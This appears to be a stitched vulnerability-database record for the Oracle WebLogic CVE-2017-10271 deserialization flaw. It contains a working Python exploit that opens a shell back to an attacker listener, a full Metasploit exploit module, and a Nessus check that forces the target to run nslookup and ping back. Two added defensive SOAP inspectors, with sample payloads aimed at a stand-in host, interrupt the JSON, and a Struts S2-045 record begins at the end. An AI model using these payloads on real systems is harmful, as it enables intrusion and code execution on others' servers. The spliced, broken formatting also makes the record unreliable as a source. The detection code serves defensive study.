cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\n print(\"Shell Listener: 
{lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2023-03-23T01:32:13", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. 
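Both proof-of-concept scripts above, and the Metasploit module that follows, send the same thing: a SOAP request to `/wls-wsat/CoordinatorPortType` whose `work:WorkContext` header carries a `java.beans.XMLDecoder` object graph, instantiating `java.lang.ProcessBuilder` (execution) or `java.net.URL` plus `openStream` (the out-of-band check). That structure is what a WAF, reverse proxy or incident-response script should key on, since the endpoint has no legitimate reason to receive an XMLDecoder graph at all. The following is an added example and not code from the exploit authors, Rapid7 or Oracle: it parses the envelope, pulls the class and method names out of the WorkContext, recovers the argv handed to ProcessBuilder, and returns a verdict. The three sample requests are constructed to match the payloads on this page; `203.0.113.10` is a documentation address standing in for an attacker's listener.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"

# Classes and methods that have no place in a WS-AT coordination request but
# appear in every public CVE-2017-10271 payload: ProcessBuilder/start for
# execution, URL/openStream for the out-of-band check.
DANGEROUS_CLASSES = {
    "java.lang.ProcessBuilder", "java.lang.Runtime", "java.net.URL",
    "java.io.FileOutputStream", "java.io.PrintWriter", "java.lang.Thread",
}
DANGEROUS_METHODS = {"start", "exec", "openStream", "write", "println"}


def inspect_soap(body):
    """deny: XMLDecoder graph naming a dangerous class/method; review: unknown
    graph or unparseable XML; allow: no WorkContext, nothing reaches XMLDecoder."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return {"verdict": "review", "reason": f"XML parse error: {exc}"}
    header = root.find(f"{{{SOAP_NS}}}Header")
    context = None if header is None else header.find(f"{{{WORK_NS}}}WorkContext")
    if context is None:
        return {"verdict": "allow", "reason": "no WorkContext header"}
    java = context.find("java")
    if java is None:
        return {"verdict": "review", "reason": "WorkContext without <java> element"}

    classes, methods, argv = set(), set(), []
    for element in java.iter():
        if element is java:
            continue  # skip the <java class="java.beans.XMLDecoder"> wrapper itself
        if "class" in element.attrib:
            classes.add(element.attrib["class"])
        if "method" in element.attrib:
            methods.add(element.attrib["method"])
        # A String[] literal is the argv handed to ProcessBuilder; keep it for the IR notes.
        if element.tag == "array" and element.attrib.get("class") == "java.lang.String":
            argv = [s.text or "" for s in element.iter("string")]

    bad_classes = sorted(classes & DANGEROUS_CLASSES)
    bad_methods = sorted(methods & DANGEROUS_METHODS)
    return {
        "verdict": "deny" if bad_classes or bad_methods else "review",
        "classes": sorted(classes), "methods": sorted(methods),
        "dangerous_classes": bad_classes, "dangerous_methods": bad_methods,
        "argv": argv,
    }


# Constructed samples shaped like the PoC payloads above (not captured traffic).
PROCESS_BUILDER = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0"><string>/bin/sh</string></void>
            <void index="1"><string>-c</string></void>
            <void index="2"><string>id</string></void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

URL_CHECK = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8" class="java.beans.XMLDecoder">
        <object id="url" class="java.net.URL"><string>http://203.0.113.10:4444/aB3x</string></object>
        <object idref="url"><void id="stream" method="openStream"/></object>
      </java>
    </work:WorkContext>
  </soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

BENIGN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body><wsat:Prepare xmlns:wsat="http://docs.oasis-open.org/ws-tx/wsat/2006/06"/></soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    for name, req in [("process-builder", PROCESS_BUILDER), ("url-check", URL_CHECK), ("benign", BENIGN)]:
        print(name, inspect_soap(req))
```

`xml.etree` is used so the block runs with the standard library alone; when inspecting untrusted requests in production, parse with `defusedxml` instead, since expat will still expand internal entity bombs. The two PoCs differ in the `version` attribute and in `<void class=...>` versus `<object class=...>`; the inspector deliberately ignores both and looks only at which classes and methods are named, so trivial payload variations do not evade it.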
Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. 
Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. 
It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" 
class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => 
normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-18T14:22:37", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WSAT endpoint due to unsafe deserialization of XML encoded Java objects. An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "Oracle WebLogic WSAT Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10271\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. 
An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... 
although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 
and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:08:36", "description": "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. 
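Both records above use the same primitive: a `<work:WorkContext>` SOAP header carrying a `<java>` block that the `wls-wsat` endpoint hands to `java.beans.XMLDecoder`, which instantiates whatever class the attacker names (`java.lang.ProcessBuilder` to run a command, `java.net.URL` plus `openStream` for an out-of-band check). The defender's side is rarely shown, so here is an added example (my own code, not from Rapid7, Tenable or the Infection Monkey project) that parses a captured POST body to the WS-AT endpoint and reports the classes, methods and ProcessBuilder argument lists the decoder would act on. The sample bodies are constructed, and the `.invalid` hostnames are placeholders.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"

# Classes an XMLDecoder payload reaches for to run commands or phone home. Legitimate
# WS-AT coordination messages never carry a <java> block inside WorkContext at all.
DANGEROUS_CLASSES = {
    "java.lang.ProcessBuilder", "java.lang.Runtime", "java.net.URL",
    "java.beans.XMLDecoder", "java.io.FileOutputStream", "java.io.PrintWriter",
}


@dataclass
class Finding:
    vulnerable_endpoint: bool                   # request path is under /wls-wsat/
    java_blocks: int = 0                        # <java> elements inside WorkContext
    classes: List[str] = field(default_factory=list)
    commands: List[List[str]] = field(default_factory=list)
    methods: List[str] = field(default_factory=list)

    @property
    def is_attack(self) -> bool:
        return self.vulnerable_endpoint and self.java_blocks > 0

    @property
    def dangerous(self) -> List[str]:
        return [c for c in self.classes if c in DANGEROUS_CLASSES]


def _string_array(void_el) -> List[str]:
    """Collect the <string> children of an <array class="java.lang.String"> in order."""
    arr = void_el.find("array")
    if arr is None or arr.get("class") != "java.lang.String":
        return []
    out = []
    for item in arr.findall("void"):
        s = item.find("string")
        out.append("" if s is None or s.text is None else s.text)
    return out


def inspect_wsat_request(path: str, body: bytes) -> Finding:
    """Parse one POST body and report what the XMLDecoder sink would do with it."""
    finding = Finding(vulnerable_endpoint=path.startswith("/wls-wsat/"))
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return finding                          # not XML: nothing for XMLDecoder to eat
    header = root.find(f"{{{SOAP_NS}}}Header")
    if header is None:
        return finding
    for work in header.findall(f"{{{WORK_NS}}}WorkContext"):
        for java in work.findall("java"):
            finding.java_blocks += 1
            for void in java.iter("void"):      # every <void>, however deeply nested
                cls = void.get("class")
                if cls:
                    finding.classes.append(cls)
                if cls == "java.lang.ProcessBuilder":
                    argv = _string_array(void)
                    if argv:
                        finding.commands.append(argv)
                if void.get("method"):
                    finding.methods.append(void.get("method"))
    return finding


# Constructed sample bodies (not captured traffic); the .invalid hostnames are placeholders.
ATTACK_BODY = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3">
<void index="0"><string>/bin/sh</string></void><void index="1"><string>-c</string></void>
<void index="2"><string>nslookup t0k3n.oob.invalid</string></void></array>
<void method="start"/></void></java></work:WorkContext></soapenv:Header>
<soapenv:Body/></soapenv:Envelope>"""
CHECK_BODY = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL"><string>http://oob.invalid/probe</string></void>
<void idref="url"><void id="stream" method="openStream"/></void>
</java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""
BENIGN_BODY = b"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/><soapenv:Body><Prepare/></soapenv:Body></soapenv:Envelope>"""


def demo() -> List[Finding]:
    """Run the inspector over the three samples; returns the findings in that order."""
    ep = "/wls-wsat/CoordinatorPortType"
    return [inspect_wsat_request(ep, b) for b in (ATTACK_BODY, CHECK_BODY, BENIGN_BODY)]


if __name__ == "__main__":
    for f in demo():
        print("ATTACK" if f.is_attack else "clean ", f.dangerous, f.commands, f.methods)
```

Run as a script it prints one line per sample. The benign WS-AT message, and the attack body sent to some other path, both come back clean because the rule is the combination of the endpoint and a `<java>` block rather than the presence of SOAP; in practice you would feed it request bodies from a WAF or reverse-proxy log, alert on `is_attack`, and escalate when `dangerous` or `commands` is non-empty.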
**Nessus plugin 97576: Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)**

* Type: Nessus combined local/version check (`STRUTS_2_5_10_1_WIN_LOCAL.NASL`), CVE-2017-5638, CPE `cpe:/a:apache:struts`
* Published 2017-03-07, modified 2022-04-11 (last seen 2023-07-28)
* Plugin page: [tenable.com/plugins/nessus/97576](<https://www.tenable.com/plugins/nessus/97576>)

```nasl
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(97576);
  script_version("1.25");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2017-5638");
  script_bugtraq_id(96729);
  script_xref(name:"CERT", value:"834067");
  script_xref(name:"EDB-ID", value:"41570");
  script_xref(name:"EDB-ID", value:"41614");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");

  script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)");

  script_set_attribute(attribute:"synopsis", value:
"The remote host contains a web application that uses a Java framework
that is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Struts running on the remote host is 2.3.5
through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore,
affected by a remote code execution vulnerability in the Jakarta
Multipart parser due to improper handling of the Content-Type,
Content-Disposition, and Content-Length headers. An unauthenticated,
remote attacker can exploit this, via a specially crafted header value
in the HTTP request, to potentially execute arbitrary code.

Note that Nessus has not tested for this issue but has instead relied
only on the application's self-reported version number.");
  script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html");
